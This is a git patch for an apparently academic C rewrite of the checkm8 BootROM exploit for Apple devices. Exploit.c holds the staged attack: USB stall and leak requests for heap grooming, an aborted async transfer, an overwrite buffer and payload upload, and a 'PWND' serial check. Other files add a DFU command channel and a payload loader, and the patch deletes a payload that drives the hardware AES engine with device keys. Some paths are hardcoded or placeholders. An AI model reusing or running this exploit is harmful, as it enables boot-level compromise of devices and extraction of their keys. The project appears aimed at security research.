From 941c476251303b0e286d5ee76beb6c1e61dfad12 Mon Sep 17 00:00:00 2001 From: Gregor Haas Date: Tue, 10 Dec 2019 16:25:11 -0500 Subject: [PATCH] A whole lot of changes to make the code more device-oriented --- CMakeLists.txt | 3 +- checkm8_payloads/CMakeLists.txt | 5 +- checkm8_payloads/aes.c | 57 ----------- checkm8_remote/CMakeLists.txt | 6 +- checkm8_remote/include/checkm8.h | 41 ++++++-- checkm8_remote/include/libusb_helpers.h | 28 +++-- checkm8_remote/include/payload.h | 7 ++ checkm8_remote/main.c | 8 +- checkm8_remote/src/command.c | 46 +++++++++ checkm8_remote/src/commands.c | 75 -------------- checkm8_remote/src/exploit.c | 129 ++++++++++++++---------- checkm8_remote/src/libusb_helpers.c | 116 +++++++++++++++------ checkm8_remote/src/payload.c | 48 +++++++-- 13 files changed, 311 insertions(+), 258 deletions(-) delete mode 100644 checkm8_payloads/aes.c create mode 100644 checkm8_remote/src/command.c delete mode 100644 checkm8_remote/src/commands.c diff --git a/CMakeLists.txt b/CMakeLists.txt index 5bff591..2da5556 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -3,9 +3,8 @@ project(ipwndfu_rewrite_c) enable_language(C) include_directories(include) +include_directories(checkm8_libusb/src) add_library(checkm8_libusb - include/checkm8_config.h include/libusb_config.h - checkm8_libusb/src/core.c checkm8_libusb/src/descriptor.c checkm8_libusb/src/hotplug.c checkm8_libusb/src/io.c checkm8_libusb/src/strerror.c checkm8_libusb/src/sync.c checkm8_libusb/src/hotplug.h include/libusb.h checkm8_libusb/src/libusbi.h checkm8_libusb/src/version.h diff --git a/checkm8_payloads/CMakeLists.txt b/checkm8_payloads/CMakeLists.txt index ea7005a..23bd44e 100644 --- a/checkm8_payloads/CMakeLists.txt +++ b/checkm8_payloads/CMakeLists.txt @@ -7,8 +7,9 @@ set(CMAKE_ASM_COMPILER /usr/bin/aarch64-linux-gnu-as) set(CMAKE_OBJCOPY /usr/bin/aarch64-linux-gnu-objcopy) set(CMAKE_C_FLAGS "-nostdlib -O") -set(PAYLOADS payload_aes) -add_executable(payload_aes aes.c) +set(PAYLOADS payload_aes payload_sysreg) +add_executable(payload_aes src/aes.c) +add_executable(payload_sysreg src/sysreg.c) file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/bin) foreach(BINARY ${PAYLOADS}) diff --git a/checkm8_payloads/aes.c b/checkm8_payloads/aes.c deleted file mode 100644 index 0f7e011..0000000 --- a/checkm8_payloads/aes.c +++ /dev/null @@ -1,57 +0,0 @@ -#include "brfunc_aes.h" -#include "brfunc_timing.h" -#include "brfunc_sep.h" - -__attribute__ ((section (".payload_text"))) -int aes_hw_crypto_command(unsigned int cmd, - void *src, - void *dst, - int len, - unsigned int opts, - void *key, - void *iv) -{ - int seeded; - long start = 0, timeout = 0; - CLOCK_GATE(0x3C, 1); - - seeded = DPA_SEEDED(); - if(!seeded) - { - SEP_CREATE_SEND_DPA_MESSAGE(); - start = SYSTEM_TIME(); - - while(!seeded && !timeout) - { - seeded = DPA_SEEDED(); - timeout = TIME_HAS_ELAPSED(start, 1000); - } - } - - if(timeout) return -1; - - unsigned int key_command = CREATE_KEY_COMMAND(0, 0, 0, 0, 1, 0, 0, 0); - *rAES_INT_STATUS = 0x20; - *rAES_CONTROL = 1; - - PUSH_COMMAND_KEY(key_command, key); - PUSH_COMMAND_IV(0, 0, 0, iv); - PUSH_COMMAND_DATA(0, 0, src, dst, len); - PUSH_COMMAND_FLAG(0, 1, 1); - WAIT_FOR_COMMAND_FLAG(); - - *rAES_CONTROL = 2; - CLOCK_GATE(0x3C, 0); - return 0; -} - -int _start(unsigned int cmd, - void *src, - void *dst, - int len, - unsigned int opts, - void *key, - void *iv) -{ - return aes_hw_crypto_command(cmd, src, dst, len, opts, key, iv); -} \ No newline at end of file diff --git a/checkm8_remote/CMakeLists.txt b/checkm8_remote/CMakeLists.txt index 077e6ed..1198748 100644 --- a/checkm8_remote/CMakeLists.txt +++ b/checkm8_remote/CMakeLists.txt @@ -2,9 +2,11 @@ set(CMAKE_C_STANDARD 99) set(CMAKE_C_FLAGS -g) include_directories(include) -add_executable(checkm8_remote main.c src/libusb_helpers.c src/commands.c src/exploit.c src/payload.c) +add_executable(checkm8_remote main.c src/libusb_helpers.c src/exploit.c src/payload.c src/command.c) add_custom_command(TARGET checkm8_remote POST_BUILD COMMAND ln - ARGS -s ${PROJECT_SOURCE_DIR}/checkm8_payloads/bin ${CMAKE_CURRENT_SOURCE_DIR}/bin/payloads) + ARGS -s -f -n + ${PROJECT_SOURCE_DIR}/checkm8_payloads/bin + ${CMAKE_CURRENT_SOURCE_DIR}/bin/payloads) target_link_libraries(checkm8_remote checkm8_libusb pthread udev) \ No newline at end of file diff --git a/checkm8_remote/include/checkm8.h b/checkm8_remote/include/checkm8.h index 8b390af..03bbf0e 100644 --- a/checkm8_remote/include/checkm8.h +++ b/checkm8_remote/include/checkm8.h @@ -1,14 +1,43 @@ #ifndef IPWNDFU_REWRITE_C_CHECKM8_H #define IPWNDFU_REWRITE_C_CHECKM8_H -int exploit_device(); +#include "checkm8_config.h" -#define AES_ENCRYPT 16 -#define AES_DECRYPT 17 +#define CHECKM8_SUCCESS 0 +#define CHECKM8_FAIL_NODEV -1 +#define CHECKM8_FAIL_NOEXP -2 -#define AES_GID_KEY 0x2000200 -#define AES_UID_KEY 0x2000201 +#define IS_CHECKM8_FAIL(code) code < 0 -int aes(unsigned char *source, unsigned char *target, int encrypt, int key); +#if CHECKM8_PLATFORM == 8010 +#define DEV_IDVENDOR 0x05AC +#define DEV_IDPRODUCT 0x1227 +#else +#error "Unspported checkm8 platform" +#endif + +struct libusb_device_bundle +{ + struct libusb_context *ctx; + struct libusb_device *device; + struct libusb_device_handle *handle; + struct libusb_device_descriptor *descriptor; +}; + +struct pwned_device +{ + enum + { + DEV_NORMAL, + DEV_PWNED + } status; + + unsigned int idVendor; + unsigned int idProduct; + struct libusb_device_bundle *bundle; +}; + +struct pwned_device *exploit_device(); +void free_device(struct pwned_device *dev); #endif //IPWNDFU_REWRITE_C_CHECKM8_H diff --git a/checkm8_remote/include/libusb_helpers.h b/checkm8_remote/include/libusb_helpers.h index 60bd330..24a89e1 100644 --- a/checkm8_remote/include/libusb_helpers.h +++ b/checkm8_remote/include/libusb_helpers.h @@ -1,35 +1,31 @@ #ifndef IPWNDFU_REWRITE_C_LIBUSB_HELPERS_H #define IPWNDFU_REWRITE_C_LIBUSB_HELPERS_H -#include "libusb-1.0/libusb.h" +#include "checkm8.h" -struct libusb_device_bundle -{ - struct libusb_device *device; - struct libusb_device_handle *handle; - struct libusb_device_descriptor descriptor; -}; +#define LIBUSB_MAX_PACKET_SIZE 0x800 -int get_test_device(libusb_context *usb_ctx, struct libusb_device_bundle *bundle); +int get_device_bundle(struct pwned_device *dev); +int release_device_bundle(struct pwned_device *dev); -void libusb1_async_ctrl_transfer(libusb_device_handle *handle, +void libusb1_async_ctrl_transfer(struct pwned_device *dev, unsigned char bmRequestType, unsigned char bRequest, unsigned short wValue, unsigned short wIndex, unsigned char *data, unsigned short data_len, unsigned int timeout); -void libusb1_no_error_ctrl_transfer(libusb_device_handle *handle, +void libusb1_no_error_ctrl_transfer(struct pwned_device *dev, unsigned char bmRequestType, unsigned char bRequest, unsigned short wValue, unsigned short wIndex, unsigned char *data, unsigned short data_len, unsigned int timeout); -void stall(libusb_device_handle *handle); -void leak(libusb_device_handle *handle); -void no_leak(libusb_device_handle *handle); +void stall(struct pwned_device *dev); +void leak(struct pwned_device *dev); +void no_leak(struct pwned_device *dev); -void usb_req_stall(libusb_device_handle *handle); -void usb_req_leak(libusb_device_handle *handle); -void usb_req_no_leak(libusb_device_handle *handle); +void usb_req_stall(struct pwned_device *dev); +void usb_req_leak(struct pwned_device *dev); +void usb_req_no_leak(struct pwned_device *dev); #endif //IPWNDFU_REWRITE_C_LIBUSB_HELPERS_H diff --git a/checkm8_remote/include/payload.h b/checkm8_remote/include/payload.h index 15bb183..238e407 100644 --- a/checkm8_remote/include/payload.h +++ b/checkm8_remote/include/payload.h @@ -1,4 +1,11 @@ #ifndef IPWNDFU_REWRITE_C_PAYLOAD_H #define IPWNDFU_REWRITE_C_PAYLOAD_H +typedef enum +{ + PAYLOAD_AES +} PAYLOAD_T; + +struct payload *get_payload(PAYLOAD_T p); + #endif //IPWNDFU_REWRITE_C_PAYLOAD_H diff --git a/checkm8_remote/main.c b/checkm8_remote/main.c index 9087fc6..6299e73 100644 --- a/checkm8_remote/main.c +++ b/checkm8_remote/main.c @@ -3,11 +3,11 @@ int main() { - int status = exploit_device(); - if(status != 0) + struct pwned_device *dev = exploit_device(); + if(dev == NULL) { - printf("Failed to checkm8_remote device\n"); - return status; + printf("Failed to exploit device\n"); + return -1; } } \ No newline at end of file diff --git a/checkm8_remote/src/command.c b/checkm8_remote/src/command.c new file mode 100644 index 0000000..a256c3f --- /dev/null +++ b/checkm8_remote/src/command.c @@ -0,0 +1,46 @@ +#include "checkm8.h" +#include "libusb_helpers.h" + +#include "libusb.h" + +void dfu_send_data(struct libusb_device_bundle *bundle, unsigned char *data, long data_len) +{ + long index = 0, amount; + while(index < data_len) + { + if(data_len - index >= LIBUSB_MAX_PACKET_SIZE) amount = LIBUSB_MAX_PACKET_SIZE; + else amount = data_len - index; + + libusb_control_transfer(bundle->handle, 0x21, 1, 0, 0, &data[index], amount, 5000); + index += amount; + } +} + +static unsigned char nullbuf[16] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}; + +int command(struct pwned_device *dev, void *data, long data_len, void *response, long response_len) +{ + struct libusb_device_bundle bundle; + int ret = get_device_bundle(&bundle); + + if(IS_CHECKM8_FAIL(ret)) + { + return ret; + } + + dfu_send_data(&bundle, nullbuf, 16); + libusb_control_transfer(bundle.handle, 0x21, 1, 0, 0, NULL, 0, 100); + libusb_control_transfer(bundle.handle, 0xA1, 3, 0, 0, NULL, 0, 100); + libusb_control_transfer(bundle.handle, 0xA1, 3, 0, 0, NULL, 6, 100); + dfu_send_data(&bundle, (unsigned char *) data, data_len); + + if(response_len == 0) + { + libusb_control_transfer(bundle.handle, 0xA1, 2, 0xFFFF, 0, response, response_len + 1, 100); + } + else + { + libusb_control_transfer(bundle.handle, 0xA1, 2, 0xFFFF, 0, response, response_len, 100); + } + +} \ No newline at end of file diff --git a/checkm8_remote/src/commands.c b/checkm8_remote/src/commands.c deleted file mode 100644 index 2f185b2..0000000 --- a/checkm8_remote/src/commands.c +++ /dev/null @@ -1,75 +0,0 @@ -#include -#include - -#include "libusb_helpers.h" -#include "checkm8.h" - -#define EXEC_MAGIC 0x6365786563657865 -#define DONE_MAGIC 0x656e6f64656e6f64 -#define MEMC_MAGIC 0x636d656d636d656d -#define MEMS_MAGIC 0x736d656d736d656d - -int command(unsigned char *request_data, int request_len, unsigned char *response_buf, int response_len) -{ - libusb_context *usb_ctx = NULL; - struct libusb_device_bundle bundle; - - libusb_init(&usb_ctx); - get_test_device(usb_ctx, &bundle); - - unsigned char nullbuf[16]; - memset(nullbuf, '\0', 16); - - libusb_control_transfer(bundle.handle, 0x21, 1, 0, 0, nullbuf, 16, 5000); - libusb_control_transfer(bundle.handle, 0x21, 1, 0, 0, nullbuf, 0, 100); - libusb_control_transfer(bundle.handle, 0xA1, 3, 0, 0, nullbuf, 6, 100); - libusb_control_transfer(bundle.handle, 0xA1, 3, 0, 0, nullbuf, 6, 100); - libusb_control_transfer(bundle.handle, 0x21, 1, 0, 0, request_data, request_len, 5000); - - if(response_len == 0) - { - libusb_control_transfer(bundle.handle, 0xA1, 2, 0xFFFF, 0, response_buf, 1, 5000); - return 0; - } - else - { - libusb_control_transfer(bundle.handle, 0xA1, 2, 0xFFFF, 0, response_buf, request_len, 5000); - return 0; - } -} - - -int execute(unsigned long *args, int nargs, unsigned char *response_buf, int response_len) -{ - unsigned char cmd_buf[8 * (nargs + 1)]; - unsigned long exec = EXEC_MAGIC; - - memcpy(cmd_buf, &exec, 8); - memcpy(&cmd_buf[8], args, 8 * nargs); - return command(cmd_buf, 8 * (nargs + 1), response_buf, response_len); -} - - -int aes(unsigned char *source, unsigned char *target, int encrypt, int key) -{ - unsigned long args[10]; - args[0] = 0x10000C8F4; // AES crypto command - args[1] = encrypt; - args[2] = 0x1800b0048; // cmd_data_address(7) - args[3] = 0x1800B0010; // cmd_data_address(0) - args[4] = 128; // length of the data - args[5] = key; - args[6] = 0; - args[7] = 0; - memcpy(&args[8], source, 16); - - unsigned char response[32]; - int ret = execute(args, 10, response, 32); - - memcpy(target, &response[16], 16); - for(int i = 0; i < 16; i++) - { - printf("%02x", target[i]); - } - return ret; -} diff --git a/checkm8_remote/src/exploit.c b/checkm8_remote/src/exploit.c index 2fe664a..7594405 100644 --- a/checkm8_remote/src/exploit.c +++ b/checkm8_remote/src/exploit.c @@ -1,132 +1,151 @@ +#include "checkm8.h" + #include #include #include +#include #include "libusb_helpers.h" +#include "libusb.h" -int complete_stage(int stage_function(struct libusb_device_bundle *bundle)) +typedef int(stage_function)(struct pwned_device *dev); + +int complete_stage(struct pwned_device *device, stage_function *func) { - libusb_context *usb_ctx = NULL; - struct libusb_device_bundle usb_bundle; int ret; - libusb_init(&usb_ctx); - ret = get_test_device(usb_ctx, &usb_bundle); - if(ret != 0) + ret = get_device_bundle(device); + if(ret == CHECKM8_FAIL_NODEV) { printf("Error: could not find test device\n"); - return ret; + return CHECKM8_FAIL_NODEV; } - libusb_open(usb_bundle.device, &usb_bundle.handle); - libusb_set_auto_detach_kernel_driver(usb_bundle.handle, 1); - - ret = stage_function(&usb_bundle); - libusb_close(usb_bundle.handle); - libusb_exit(usb_ctx); - + ret = func(device); + release_device_bundle(device); return ret; } -int stage1_function(struct libusb_device_bundle *bundle) +int stage1_function(struct pwned_device *dev) { printf("~~~ Exploit stage 1 ~~~\n"); unsigned int i; - stall(bundle->handle); + stall(dev); for(i = 0; i < 5; i++) { - no_leak(bundle->handle); + no_leak(dev); } - usb_req_leak(bundle->handle); - no_leak(bundle->handle); + usb_req_leak(dev); + no_leak(dev); - libusb_reset_device(bundle->handle); - - return 0; + libusb_reset_device(dev->bundle->handle); + return CHECKM8_SUCCESS; } -int stage2_function(struct libusb_device_bundle *bundle) +int stage2_function(struct pwned_device *dev) { printf("~~~ Exploit stage 2 ~~~\n"); unsigned char databuf[0x800]; memset(databuf, 'A', 0x800); - libusb1_async_ctrl_transfer(bundle->handle, 0x21, 1, 0, 0, databuf, 0x800, 1); - libusb1_no_error_ctrl_transfer(bundle->handle, 0x21, 4, 0, 0, NULL, 0, 0); + libusb1_async_ctrl_transfer(dev, 0x21, 1, 0, 0, databuf, 0x800, 1); + libusb1_no_error_ctrl_transfer(dev, 0x21, 4, 0, 0, NULL, 0, 0); - libusb_reset_device(bundle->handle); - - return 0; + libusb_reset_device(dev->bundle->handle); + return CHECKM8_SUCCESS; } -int stage3_function(struct libusb_device_bundle *bundle) +int stage3_function(struct pwned_device *dev) { printf("~~~ Exploit stage 3 ~~~\n"); unsigned char overwrite_buf[1524]; - FILE *overwrite_file = fopen("/home/grg/Projects/School/NCSU/iphone_aes_sc/ipwndfu_rewrite_c/checkm8_remote/bin/overwrite.bin", "r"); + FILE *overwrite_file = fopen( + "/home/grg/Projects/School/NCSU/iphone_aes_sc/ipwndfu_rewrite_c/checkm8_remote/bin/overwrite.bin", "r"); fread(overwrite_buf, 1524, 1, overwrite_file); fclose(overwrite_file); unsigned char payload_buf[2400]; - FILE *payload_file = fopen("/home/grg/Projects/School/NCSU/iphone_aes_sc/ipwndfu_rewrite_c/checkm8_remote/bin/payload.bin", "r"); + FILE *payload_file = fopen( + "/home/grg/Projects/School/NCSU/iphone_aes_sc/ipwndfu_rewrite_c/checkm8_remote/bin/payload.bin", "r"); fread(payload_buf, 2400, 1, payload_file); fclose(payload_file); - usb_req_stall(bundle->handle); - usb_req_leak(bundle->handle); + usb_req_stall(dev); + usb_req_leak(dev); - libusb1_no_error_ctrl_transfer(bundle->handle, 0, 0, 0, 0, overwrite_buf, 1524, 100); - libusb1_no_error_ctrl_transfer(bundle->handle, 0x21, 1, 0, 0, payload_buf, 2048, 100); - libusb1_no_error_ctrl_transfer(bundle->handle, 0x21, 1, 0, 0, &payload_buf[2048], 352, 100); + libusb1_no_error_ctrl_transfer(dev, 0, 0, 0, 0, overwrite_buf, 1524, 100); + libusb1_no_error_ctrl_transfer(dev, 0x21, 1, 0, 0, payload_buf, 2048, 100); + libusb1_no_error_ctrl_transfer(dev, 0x21, 1, 0, 0, &payload_buf[2048], 352, 100); - libusb_reset_device(bundle->handle); - return 0; + libusb_reset_device(dev->bundle->handle); + return CHECKM8_SUCCESS; } -int check_function(struct libusb_device_bundle *bundle) +int check_function(struct pwned_device *dev) { unsigned char serial_buf[128]; unsigned int i; - struct libusb_device_handle *handle = bundle->handle; - struct libusb_device_descriptor desc = bundle->descriptor; + struct libusb_device_handle *handle = dev->bundle->handle; + struct libusb_device_descriptor *desc = dev->bundle->descriptor; - libusb_get_string_descriptor_ascii(handle, desc.iSerialNumber, serial_buf, sizeof(serial_buf)); + libusb_get_string_descriptor_ascii(handle, desc->iSerialNumber, serial_buf, sizeof(serial_buf)); printf("Found device with serial %s\n", serial_buf); for(i = 0; i < 13; i++) { if(serial_buf[99 + i] != "PWND:[checkm8]"[i]) { - return 1; + return CHECKM8_FAIL_NOEXP; } } - return 0; + return CHECKM8_SUCCESS; } -int exploit_device() +struct pwned_device *exploit_device() { - int ret = complete_stage(check_function); - if(ret == 0) return ret; + struct pwned_device *res = calloc(1, sizeof(struct pwned_device)); + res->status = DEV_NORMAL; + res->bundle = calloc(1, sizeof(struct libusb_device_bundle)); + res->idVendor = DEV_IDVENDOR; + res->idProduct = DEV_IDPRODUCT; - ret = complete_stage(stage1_function); - if(ret == 0) + int ret = complete_stage(res, check_function); + if(IS_CHECKM8_FAIL(ret)) { - ret = complete_stage(stage2_function); + free_device(res); + return NULL; + } + + ret = complete_stage(res, stage1_function); + if(ret == CHECKM8_SUCCESS) + { + ret = complete_stage(res, stage2_function); usleep(500000); } - if(ret == 0) + if(ret == CHECKM8_SUCCESS) { - ret = complete_stage(stage3_function); + ret = complete_stage(res, stage3_function); usleep(500000); } - if(ret == 0) + if(ret == CHECKM8_SUCCESS) { - ret = complete_stage(check_function); + ret = complete_stage(res, check_function); } - return ret; + if(ret == CHECKM8_SUCCESS) + { + res->status = DEV_PWNED; + return res; + } + else return NULL; +} + +void free_device(struct pwned_device *dev) +{ + release_device_bundle(dev); + free(dev); } \ No newline at end of file diff --git a/checkm8_remote/src/libusb_helpers.c b/checkm8_remote/src/libusb_helpers.c index f1b3366..da70867 100644 --- a/checkm8_remote/src/libusb_helpers.c +++ b/checkm8_remote/src/libusb_helpers.c @@ -1,44 +1,96 @@ #include "libusb_helpers.h" -#include "libusb.h" +#include "checkm8.h" #include #include #include -int get_test_device(libusb_context *usb_ctx, struct libusb_device_bundle *bundle) +#include "../../checkm8_libusb/src/libusbi.h" + +int get_device_bundle(struct pwned_device *dev) { + if(dev->bundle->ctx == NULL) + { + dev->bundle->ctx = malloc(sizeof(libusb_context)); + libusb_init(&dev->bundle->ctx); + } + else + { + if(dev->bundle->descriptor != NULL && + dev->bundle->descriptor->idVendor == dev->idVendor && + dev->bundle->descriptor->idProduct == dev->idProduct) + { + return LIBUSB_SUCCESS; + } + } + libusb_device **usb_device_list = NULL; - int usb_dev_count, ret = 1; + int usb_dev_count, ret = LIBUSB_ERROR_NO_DEVICE; - usb_dev_count = libusb_get_device_list(usb_ctx, &usb_device_list); + usb_dev_count = libusb_get_device_list(dev->bundle->ctx, &usb_device_list); - libusb_device *usb_device = NULL; - libusb_device_handle *usb_handle = NULL; - struct libusb_device_descriptor usb_desc = {0}; + dev->bundle->device = NULL; + dev->bundle->handle = NULL; + dev->bundle->descriptor = malloc(sizeof(struct libusb_device_descriptor)); for(unsigned int i = 0; i < usb_dev_count; i++) { - usb_device = usb_device_list[i]; - libusb_get_device_descriptor(usb_device, &usb_desc); + dev->bundle->device = usb_device_list[i]; + libusb_get_device_descriptor(dev->bundle->device, dev->bundle->descriptor); - if(usb_desc.idVendor == 0x05AC && usb_desc.idProduct == 0x1227) + if(dev->bundle->descriptor->idVendor == dev->idVendor && + dev->bundle->descriptor->idProduct == dev->idProduct) { - ret = 0; + ret = LIBUSB_SUCCESS; break; } } libusb_free_device_list(usb_device_list, usb_dev_count); - if(ret == 0) + if(ret == LIBUSB_SUCCESS) { - bundle->device = usb_device; - bundle->handle = usb_handle; - bundle->descriptor = usb_desc; + libusb_open(dev->bundle->device, &dev->bundle->handle); + libusb_set_auto_detach_kernel_driver(dev->bundle->handle, 1); + } + else + { + libusb_exit(dev->bundle->ctx); + free(dev->bundle->ctx); + free(dev->bundle->descriptor); + + dev->bundle->ctx = NULL; + dev->bundle->device = NULL; + dev->bundle->handle = NULL; + dev->bundle->descriptor = NULL; } return ret; } +int release_device_bundle(struct pwned_device *dev) +{ + if(dev->bundle->handle != NULL) + { + libusb_close(dev->bundle->handle); + } + + dev->bundle->device = NULL; + + if(dev->bundle->ctx != NULL) + { + libusb_exit(dev->bundle->ctx); + free(dev->bundle->ctx); + } + + if(dev->bundle->descriptor != NULL) + { + free(dev->bundle->descriptor); + dev->bundle->descriptor = NULL; + } + + return LIBUSB_SUCCESS; +} + void LIBUSB_CALL async_ctrl_transfer_cb(struct libusb_transfer *transfer) { printf("transfer status: %s (%i / %i)\n", @@ -47,7 +99,7 @@ void LIBUSB_CALL async_ctrl_transfer_cb(struct libusb_transfer *transfer) transfer->length); } -void libusb1_async_ctrl_transfer(libusb_device_handle *handle, +void libusb1_async_ctrl_transfer(struct pwned_device *dev, unsigned char bmRequestType, unsigned char bRequest, unsigned short wValue, unsigned short wIndex, unsigned char *data, unsigned short data_len, @@ -62,7 +114,7 @@ void libusb1_async_ctrl_transfer(libusb_device_handle *handle, struct libusb_transfer *usb_transfer = libusb_alloc_transfer(0); libusb_fill_control_setup(usb_transfer_buf, bmRequestType, bRequest, wValue, wIndex, data_len); memcpy(&usb_transfer_buf[8], data, data_len); - libusb_fill_control_transfer(usb_transfer, handle, usb_transfer_buf, async_ctrl_transfer_cb, NULL, 1); + libusb_fill_control_transfer(usb_transfer, dev->bundle->handle, usb_transfer_buf, async_ctrl_transfer_cb, NULL, 1); ret = libusb_submit_transfer(usb_transfer); if(ret != 0) @@ -90,7 +142,7 @@ void libusb1_async_ctrl_transfer(libusb_device_handle *handle, } } -void libusb1_no_error_ctrl_transfer(libusb_device_handle *handle, +void libusb1_no_error_ctrl_transfer(struct pwned_device *dev, unsigned char bmRequestType, unsigned char bRequest, unsigned short wValue, unsigned short wIndex, unsigned char *data, unsigned short data_len, @@ -102,7 +154,7 @@ void libusb1_no_error_ctrl_transfer(libusb_device_handle *handle, if(recipient == 1 && rqtype == (2u << 5u)) { unsigned short interface = wIndex & 0xFFu; - ret = libusb_claim_interface(handle, interface); + ret = libusb_claim_interface(dev->bundle->handle, interface); if(ret > 0) { printf("%s\n", libusb_error_name(ret)); @@ -110,7 +162,7 @@ void libusb1_no_error_ctrl_transfer(libusb_device_handle *handle, } } - ret = libusb_control_transfer(handle, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout); + ret = libusb_control_transfer(dev->bundle->handle, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout); printf("%s\n", libusb_error_name(ret)); } @@ -180,39 +232,39 @@ static unsigned char data_0x0_0xC0_buf[192] = 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 }; -void stall(libusb_device_handle *handle) +void stall(struct pwned_device *dev) { - libusb1_async_ctrl_transfer(handle, 0x80, 6, 0x304, 0x40A, + libusb1_async_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0xA_0xC0_buf, 0xC0, 1); } -void leak(libusb_device_handle *handle) +void leak(struct pwned_device *dev) { - libusb1_no_error_ctrl_transfer(handle, 0x80, 6, 0x304, 0x40A, + libusb1_no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0xC0_buf, 0xC0, 1); } -void no_leak(libusb_device_handle *handle) +void no_leak(struct pwned_device *dev) { - libusb1_no_error_ctrl_transfer(handle, 0x80, 6, 0x304, 0x40A, + libusb1_no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0xA_0xC1_buf, 0xC1, 1); } -void usb_req_stall(libusb_device_handle *handle) +void usb_req_stall(struct pwned_device *dev) { unsigned char data[0]; - libusb1_no_error_ctrl_transfer(handle, 0x2, 3, 0, 0x80, data, 0, 1); + libusb1_no_error_ctrl_transfer(dev, 0x2, 3, 0, 0x80, data, 0, 1); } -void usb_req_leak(libusb_device_handle *handle) +void usb_req_leak(struct pwned_device *dev) { - libusb1_no_error_ctrl_transfer(handle, 0x80, 6, 0x304, 0x40A, + libusb1_no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0x40_buf, 0x40, 1); } -void usb_req_no_leak(libusb_device_handle *handle) +void usb_req_no_leak(struct pwned_device *dev) { - libusb1_no_error_ctrl_transfer(handle, 0x80, 6, 0x304, 0x40A, + libusb1_no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0x41_buf, 0x41, 1); } \ No newline at end of file diff --git a/checkm8_remote/src/payload.c b/checkm8_remote/src/payload.c index 98b23eb..111aa4b 100644 --- a/checkm8_remote/src/payload.c +++ b/checkm8_remote/src/payload.c @@ -1,14 +1,48 @@ -#include "../include/payload.h" +#include "payload.h" -#include #include +#include -void read_elf_header(const char *filename) +struct payload { - Elf64_Ehdr header; - FILE *file = fopen(filename, "rb"); - if(file) + char *path; + unsigned char *data; + long len; +}; + +struct payload *get_payload(PAYLOAD_T p) +{ + FILE *payload_file; + struct payload *res; + char *path; + + switch(p) { - fread(&header, 1, sizeof(header), file); + case PAYLOAD_AES: + path = "blehblehbleh"; + break; + + default: + return NULL; } + + res = malloc(sizeof(struct payload)); + if(res == NULL) return NULL; + + if((payload_file = fopen(path, "rb")) == NULL) + { + free(res); + return NULL; + } + + fseek(payload_file, 0, SEEK_END); + res->path = path; + res->len = ftell(payload_file); + res->data = malloc(res->len); + + rewind(payload_file); + fread(res->data, 1, res->len, payload_file); + fclose(payload_file); + + return res; } \ No newline at end of file